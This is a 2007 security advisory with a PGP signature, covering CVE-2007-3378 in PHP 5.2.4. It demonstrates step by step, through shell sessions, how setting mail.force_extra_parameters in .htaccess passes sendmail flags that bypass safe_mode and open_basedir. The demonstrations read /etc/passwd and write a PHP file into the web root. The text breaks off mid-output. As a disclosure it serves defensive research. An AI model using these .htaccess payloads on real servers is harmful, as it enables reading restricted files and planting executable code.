|
-----BEGIN PGP SIGNED MESSAGE-----=0D
Hash: SHA1=0D
=0D
[PHP 5.2.4 mail.force_extra_parameters unsecure ]=0D
=0D
Author: Maksymilian Arciemowicz (cXIb8O3)=0D
SecurityReason=0D
Date:=0D
- - Written: 06.09.2007=0D
- - Public: 0x.0x.2007=0D
=0D
SecurityReason Research=0D
SecurityAlert Id: 47=0D
=0D
CVE: CVE-2007-3378=0D
SecurityRisk: Medium=0D
=0D
Affected Software: PHP <= 5.2.4=0D
Advisory URL:=0D
http://securityreason.com/achievement_securityalert/47=0D
Vendor: http://www.php.net=0D
=0D
- --- 0.Description ---=0D
=0D
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.=0D
When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. httpd.conf) and .htaccess files. You will need "AllowOverride Options" or "AllowOverride All" privileges to do so.=0D
=0D
php_value name value=0D
=0D
Sets the value of the specified directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a previously set value use none as the value.=0D
Note: Don't use php_value to set boolean values. php_flag (see below) should be used instead.=0D
=0D
php_flag name on|off=0D
=0D
Used to set a boolean configuration directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives.=0D
=0D
mail.force_extra_parameters - Force the addition of the specified parameters to be passed as extra parameters to the sendmail binary. These parameters will always replace the value of the 5th parameter to mail(), even in safe mode=0D
=0D
http://pl.php.net/manual/en/configuration.changes.php=0D
=0D
- --- 1. htaccess safemode and open_basedir Bypass Vulnerability per mail.force_extra_parameters ---=0D
=0D
We have recrived a lot of question about news http://securityreason.com/news/0/0x1f . And we will show How to exploit this issue. When using PHP as an Apache module, you can also change the configuration settings using directives in .htaccess file. But it is possible to bypass a safe_mode or open_basedir per mail.force_extra_parameters. In a lot of servers is sendmail, can be also exim etc. But we show how to exploit this for a famous mail server (SENDMAIL).=0D
=0D
For example you can set mail.force_extra_parameters via .htaccess.=0D
=0D
cxib# curl -I http://localhost:82=0D
HTTP/1.1 200 OK=0D
Date: Thu, 06 Sep 2007 22:18:35 GMT=0D
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.4=0D
Last-Modified: Sat, 20 Nov 2004 20:16:24 GMT=0D
ETag: "27e4f0-2c-4c23b600"=0D
Accept-Ranges: bytes=0D
Content-Length: 44=0D
Content-Type: text/html=0D
=0D
Apache 2.2.4 and PHP 5.2.4. Let's see folder "/narkotyk" in localhost:82.=0D
=0D
cxib# ls -la=0D
total 10=0D
drwxrwxrwx 2 www www 512 Sep 7 00:26 .=0D
drwxr-xr-x 4 www wheel 512 Sep 7 00:22 ..=0D
- -rw-r--r-- 1 www www 106 Sep 7 00:25 .htaccess=0D
- -rw-r--r-- 1 www www 29 Sep 7 00:25 file1.php=0D
- -rw-r--r-- 1 www www 56 Sep 7 00:26 file2.php=0D
cxib# cat file1.php=0D
include("/etc/passwd"); ?>=0D
=0D
cxib# curl http://localhost:82/narkotyk/file1.php=0D
=0D
Warning: include() [function.include]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/passwd owned by uid 0 in /usr/local/www/apache22/data/narkotyk/file1.php on line 1
=0D
=0D
Warning: include(/etc/passwd) [function.include]: failed to open stream: Invalid argument in /usr/local/www/apache22/data/narkotyk/file1.php on line 1
=0D
=0D
Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in /usr/local/www/apache22/data/narkotyk/file1.php on line 1
=0D
=0D
so safe_mode is open.=0D
Let's see files .htaccess and file2.php=0D
=0D
cxib# cat file2.php=0D
var_dump(mail("root@localhost", "hallo", "root")); ?>=0D
cxib# cat .htaccess=0D
php_value mail.force_extra_parameters '-C /etc/passwd -X /usr/local/www/apache22/data/narkotyk/result.txt'=0D
=0D
and let's send request to file2.php=0D
=0D
cxib# curl http://localhost:82/narkotyk/file2.php=0D
bool(false)=0D
=0D
False!? No =0D
=0D
cxib# ls -la /usr/local/www/apache22/data/narkotyk/result.txt=0D
- -rw-r--r-- 1 www www 7130 Sep 7 00:31 /usr/local/www/apache22/data/narkotyk/result.txt=0D
cxib#=0D
=0D
result.txt has been created.=0D
=0D
cxib# cat /usr/local/www/apache22/data/narkotyk/result.txt=0D
69647 >>> /etc/passwd: line 3: unknown configuration line "root:*:0:0:Charlie &:/root:/bin/csh"=0D
69647 >>> /etc/passwd: line 4: unknown configuration line "toor:*:0:0:Bourne-again Superuser:/root:"=0D
..... etc.=0D
=0D
We can read file and safe_mode and open_basedir is bypassed.=0D
=0D
It is possible create file with php code. But we need have sendmail.cf to send email.=0D
=0D
Example:=0D
=0D
cxib# cat .htaccess=0D
php_value mail.force_extra_parameters '-C /usr/local/www/apache22/data/narkotyk/sendmail.cf -X /usr/local/www/apache22/data/narkotyk/phpcode.php'=0D
cxib# cat file3.php=0D
var_dump(mail("root@xxxxxxxxxxxxxxxxxx", "h phpinfo(); ?>allo", "root")); ?>=0D
=0D
We need create /usr/local/www/apache22/data/narkotyk/sendmail.cf and configure this file. Then=0D
=0D
cxib# curl http://localhost:82/narkotyk/file3.php=0D
bool(true)=0D
cxib#=0D
cxib# cat phpcode.php=0D
69755 <<< To: root@xxxxxxxxxxxxxxxxxx=0D
69755 <<< Subject: h phpinfo(); ?>allo=0D
69755 <<<=0D
69755 <<< root=0D
69755 <<< [EOF]=0D
69757 === CONNECT securityreason.pl=0D
... etc=0D
=0D
and now=0D
=0D
cxib# curl http://localhost:82/narkotyk/phpcode.php=0D
69755 <<< To: root@xxxxxxxxxxxxxxxxxx=0D
69755 <<< Subject: h=0D
=0D